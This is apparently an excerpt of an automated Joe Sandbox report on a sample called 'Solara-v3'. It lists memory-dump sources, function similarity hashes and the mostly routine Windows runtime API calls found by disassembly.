                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 127012223-0
                                                                                                                                                                                                                                              • Opcode ID: b608f18d578ab03d40588e7bd709b863bd471a4b95cab0adef1f0c866427225d
                                                                                                                                                                                                                                              • Instruction ID: baa90513af75e60df0bf795bd0072724dc61c910314f7f13e4015ec782ef0c4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b608f18d578ab03d40588e7bd709b863bd471a4b95cab0adef1f0c866427225d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B771D87290020AABDF319F64CC41FEF7BBADF45310F290059E9A4A7192E7359E419792
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00C9FE70
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9FE9C
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00C9FEDB
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C9FEF8
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C9FF37
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9FF54
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00C9FF96
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C9FFB9
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2040435927-0
                                                                                                                                                                                                                                              • Opcode ID: 45fb3afe7c14b39a0f3d3d5fda312c7986fe1e6cdf6589a7077fe6c9c0b13f2c
                                                                                                                                                                                                                                              • Instruction ID: 6a3fe445a5f90fe5cd29ca477b17a74fb524b321a2a13b155bc493647320846c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45fb3afe7c14b39a0f3d3d5fda312c7986fe1e6cdf6589a7077fe6c9c0b13f2c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63518C7260021AAFEF205FA1CC49FAA7BF9EF41754F244439F925DA1A0D730CD129B60
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                              • Instruction ID: 4617277c9166d252428a5f83436a84e547114d712b0b6fd9611559e9971439a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72B14872A003579FDB118FA4CC81BEEBBA5EF56318F144169E954AB382D6749E02C7E0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0D77
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CA0D7F
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0E08
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CA0E33
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0E88
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 6ca5ec5b44e2eec9ed2f48eff890f80925f12bdaac0079709efa3fcf7a002f1c
                                                                                                                                                                                                                                              • Instruction ID: 0ffe21d563fef630f30f9d8d35780f3cad4bc6870d1c10a84fb02c25c219f177
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca5ec5b44e2eec9ed2f48eff890f80925f12bdaac0079709efa3fcf7a002f1c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54410730E0021E9BCF10DF68C885A9E7BB5AF46358F248555F9155B393D731AE11DB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CA0086
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CA0094
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00CA00A5
Memory Dump Source
• Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99C97
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CA8
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CBC
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CDD
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CEE
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99D06
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2134207285-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CAACDE,00CA0760,00C9B77F,3F29B6ED,?,?,?,?,00CBBFCA,000000FF), ref: 00CAACF5
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CAAD03
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CAAD1C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00CAACDE,00CA0760,00C9B77F,3F29B6ED,?,?,?,?,00CBBFCA,000000FF), ref: 00CAAD6E
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00CAB68D
                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00CAB906
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                              • Opcode ID: 6cd9fcfec676311d0f07537f2c1dcec012c4349e264e22249b0f1c1a18ff9679
                                                                                                                                                                                                                                              • Instruction ID: f22d2c79a3326b57d1c3ab4d136db52a1eae5c052a6927cee439a7d94e603bff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cd9fcfec676311d0f07537f2c1dcec012c4349e264e22249b0f1c1a18ff9679
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37B15A7180020AEFCF18DFA5C8819AEB7B9FF06318F14455AF8216B252D736DE51EB91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9BF44
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9C028
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                              • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                              • Opcode ID: b7f0c12a10aa9fb59450fe93a7c7b38a33d6b04898abe660bb72f39d3ee1b771
                                                                                                                                                                                                                                              • Instruction ID: 1b215253950c5c51c81674f35c47db4e2ab0e66fe46735ffa08d4d3d1a628ee4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7f0c12a10aa9fb59450fe93a7c7b38a33d6b04898abe660bb72f39d3ee1b771
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F41AF78900205EFCF28DFA8EA499ADB7B5BF48300B58805DE459A7651C734EF44DB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3F29B6ED,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00000002,?,00CA5721,00CA8396), ref: 00CA55F9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CA560B
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00000002,?,00CA5721,00CA8396), ref: 00CA562D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: b71069e5a27409519b7d6d13d384d05e580ec18669b16d65ae3979fb821712ff
                                                                                                                                                                                                                                              • Instruction ID: 04e45b4562e0ac766fcaa26d2a52093142dd0bcf43f396b4022f2a031f90f00f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b71069e5a27409519b7d6d13d384d05e580ec18669b16d65ae3979fb821712ff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39018631A40659AFDB118F54DD09FEEB7B8FB05B15F004529F821A22A0DB759E00CA90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CAD76F
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CAD838
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD89F
                                                                                                                                                                                                                                                • Part of subcall function 00CABF11: RtlAllocateHeap.NTDLL(00000000,00CADF35,?,?,00CADF35,00000220,?,00000000,?), ref: 00CABF43
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD8B2
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD8BF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1423051803-0
                                                                                                                                                                                                                                              • Opcode ID: a6bb72f5d1e46674599f41e4e8fff60717aa401b5001ba503bd6399f757f6043
                                                                                                                                                                                                                                              • Instruction ID: 7388c92329f8f2e89e58155c54f68ed76504ee94ec4d8dc3f7fc9a5945ae50b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6bb72f5d1e46674599f41e4e8fff60717aa401b5001ba503bd6399f757f6043
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE51A172600207AFEB259F618C85EBF3AA9EF46718B190128FD17D6591E734CD50D6A0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C9F005
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00C98E38), ref: 00C9F024
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F052
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F0AD
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F0C4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 66001078-0
                                                                                                                                                                                                                                              • Opcode ID: 1b13980c7361f5676c9baf0c37f708146283441ab5f859f06d62946f93a014d2
                                                                                                                                                                                                                                              • Instruction ID: 7cb60469e60d3eba02824e52c9b2719e854e56e246de6bea652ef82c6105916e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b13980c7361f5676c9baf0c37f708146283441ab5f859f06d62946f93a014d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2741587160060ADBCF20CF65C989AAEB7F8FF04311B20593EE466C7542D730EA86DB91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93CA5
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93CBF
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C93CE0
                                                                                                                                                                                                                                              • __Getctype.LIBCPMT ref: 00C93D92
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C93DD8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3087743877-0
                                                                                                                                                                                                                                              • Opcode ID: 59fd7775d9f215b5e043b60a88d400264f0c945916757060a7ac657fa37791b9
                                                                                                                                                                                                                                              • Instruction ID: b1e6b096cebeb2add7d7cb4ddc9487e84cfd50b24113dc315e5fe30dafd249ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59fd7775d9f215b5e043b60a88d400264f0c945916757060a7ac657fa37791b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF4136B2E002588FCF14DF94D858BAEB7B1FB48724F158219D8296B391DB34AE41CF91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9D4C9
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9D4D3
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00C9D4EA
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00C9C1F6
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00C9C210
                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 00C9D50D
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9D544
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3716348337-0
                                                                                                                                                                                                                                              • Opcode ID: 2f3c688d904739fdc24ed71108a9fc53b7379734c3320af4deb2afc729a31d70
                                                                                                                                                                                                                                              • Instruction ID: 32339ddc927fb1342d4d5e8b189261eb2aff3d7a84eef0effa841250f0d50a63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f3c688d904739fdc24ed71108a9fc53b7379734c3320af4deb2afc729a31d70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F01C4719002158FCF01EBA4C949BAE7771AF84724F150009E426AB291CF34DE41EB81
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9ADDE
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9ADE9
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9AE57
                                                                                                                                                                                                                                                • Part of subcall function 00C9ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C9ACC2
                                                                                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00C9AE04
                                                                                                                                                                                                                                              • _Yarn.LIBCPMT ref: 00C9AE1A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1088826258-0
                                                                                                                                                                                                                                              • Opcode ID: a9c35d62559c63c5260b3881924edc20e194a9bec2df68adaeb0fdf1f8df58d2
                                                                                                                                                                                                                                              • Instruction ID: 0169a4fbfd961b30d26cdc201735149d79477b7a5762b6a601f5368f2910be2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9c35d62559c63c5260b3881924edc20e194a9bec2df68adaeb0fdf1f8df58d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD017875A002609BCF06EB20D999B7D7B61FF88750B154059E8169B391CF39AE42EBC2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9B809
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                              • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                              • Opcode ID: 238d5308a5a164cab1b56eadbfdf40bc917b4e14d40608c4056c13fedb456114
                                                                                                                                                                                                                                              • Instruction ID: 18fa9d96c0b030266ef7c04d39e6e8cf081da70a01b48637136064ea45a3acb7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 238d5308a5a164cab1b56eadbfdf40bc917b4e14d40608c4056c13fedb456114
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E021F535800605FFCF249F94E65AB79B7ACEF84760F14461DE4218B6D1DB34AF40CA90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CB69DC,00000000,?,00CCD2B0,?,?,?,00CB6913,00000004,InitializeCriticalSectionEx,00CC0D34,00CC0D3C), ref: 00CB694D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CB69DC,00000000,?,00CCD2B0,?,?,?,00CB6913,00000004,InitializeCriticalSectionEx,00CC0D34,00CC0D3C,00000000,?,00CABBBC), ref: 00CB6957
